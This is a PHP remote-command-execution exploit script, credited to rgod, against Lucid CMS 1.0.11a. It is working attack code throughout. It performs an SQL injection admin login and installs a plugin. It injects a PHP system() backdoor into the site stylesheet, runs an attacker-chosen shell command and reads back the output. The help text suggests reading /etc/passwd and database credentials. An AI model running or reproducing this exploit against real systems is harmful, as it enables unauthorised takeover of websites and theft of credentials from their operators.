Lucid CMS V 1.0.11a (possibly prior versions) remote commands execution

a script by rgod at http://rgod.altervista.org

hostname (ex: www.sitename.com)

path ( ex: /lucidcms/ or just /)

specify a port other than 80 (default value)

a Unix command , example: ls -la to list directories, cat /etc/passwd to show passwd file, cat dbConfig.php to show data base username & password

send exploit through an HTTP proxy (ip:port)

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket() //if you heve sockets module loaded, 2x speed! if not,load //next function to send packets { global $proxy, $host, $port, $packet, $html; $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket < 0) { echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; } else { echo "OK.
"; echo "Attempting to connect to ".$host." on port ".$port."...
"; if ($proxy=='') { $result = socket_connect($socket, $host, $port); } else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts =explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $result = socket_connect($socket, $parts[0],$parts[1]); } if ($result < 0) { echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

"; } else { echo "OK.

"; $html= ''; socket_write($socket, $packet, strlen($packet)); echo "Reading response:
"; while ($out= socket_read($socket, 2048)) {$html.=$out;} echo nl2br(htmlentities($html)); echo "Closing socket..."; socket_close($socket); } } } function sendpacketii($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($command<>'')) { if ($port=='') {$port=80;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} # so... you know, I'm verbous... #STEP 1 -> SQL Injection /Login as admin $sql="%27UNION%28SELECT%271%27%2C%27admin%27%2C%27admin%27%2C%27FAKE@FAKEhotmail.com%27%2C%27d41d8cd98f00b204e9800998ecf8427e%27%2C%271%27%29%2F*"; $sql.=urlencode("Have you ever read that number of X-factor when Jamie Madroz dies 'cause the mutants HIV?"); $data="login_username=".$sql."&login_password=&pageName=&PromptTime=".time(); $packet="POST ".$p."index.php?command=panel HTTP/1.1\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.':'.$port.$path."index.php?command=panel\r\n"; $packet.="Accept-Language: fr\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7 (Debian package 1.0.7-1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n"; $packet.="Cookie: PHPSESSID=836324332f0e37553bfa7036f3985f20\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); $temp=explode("Set-Cookie: ",$html); $temp2=explode(' ',$temp[1]); $cookie=$temp2[0]."path=/"; echo'
cookie: -> '.htmlentities($cookie).'

'; #STEP 2 -> Install RenderPHP plugin... $packet="GET ".$p."index.php?command=pluginInstall&filename=renderPHP.php HTTP/1.1\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.':'.$port.$path."index.php?command=managePlugins\r\n"; $packet.="Accept-Language: pl\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SaveWealth)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cookie: ".$cookie."\r\n\r\n"; show($packet); sendpacket($packet); #STEP 3 -> Plugin activate... $packet="GET ".$p."index.php?command=pluginActivate&filename=renderPHP.php HTTP/1.1\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.':'.$port.$path."index.php?command=pluginInstall&filename=renderPHP.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cookie: ".$cookie."\r\n\r\n"; show($packet); sendpacket($packet); #STEP 4 -> Get Stylesheet for main page, we don't want to ruin that, just to put a backdoor $packet="GET ".$p."index.php?command=layout&mode=edit&type=style&id=1 HTTP/1.1\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.':'.$path."index.php?command=manageStyles\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Opera/8.5 (X11; Linux i686; U; en)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cookie: ".$cookie."\r\n\r\n"; show($packet); sendpacket($packet); $temp='';$i=0; while (!eregi('textarea',$temp)) { $temp.=$html[$i]; $i++; } $temp=''; while (!eregi('>',$temp)) { $temp.=$html[$i]; $i++;}; $temp=''; while (!eregi('',$temp)) { $temp.=$html[$i]; $i++; } $temp=str_replace("","",$temp); $temp2=explode("***end***",$temp); echo '
'.nl2br(htmlentities($temp2[0])).'

'; $sheet=$temp2[0]; #STEP 5 -> Shell Inject $data="content=".urlencode($sheet); #******shell******************** //ehi, this is your command line, add some # to clean stylesheet... $data.="***end***"; $data.="%0D%0A%3C%3Fphp+error_reporting%280%29%3B+system%28%27".urlencode($command); $data.="+%3E+README";//through this you redirect, a # to if you want to give a rm to output file... $data.="%27%29%3B+%3F%3E"; #******************************* $data.="&id=1&save=Save+Style&comment="; $packet="POST ".$p."index.php?command=saveStyle HTTP/1.1\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.':'.$port.$path."index.php?command=layout&mode=edit&type=style&id=1\r\n"; $packet.="Accept-Language: es\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: WebCopier v4.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n"; $packet.="Cookie: ".$cookie."\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); #STEP 6 -> Execute command $packet="GET ".$p."index.php HTTP/1.1\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mediapartners-Google/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Keep-Alive\r\n\r\n"; show($packet); sendpacket($packet); #STEP 7 -> Looking for redirected output... $packet="GET ".$p."README HTTP/1.1\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: GameBoy, powered by Nintendo\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Keep-Alive\r\n\r\n"; show($packet); sendpacket($packet); } else {echo '
fill requested fields, optionalyy specify a proxy...

';} ?>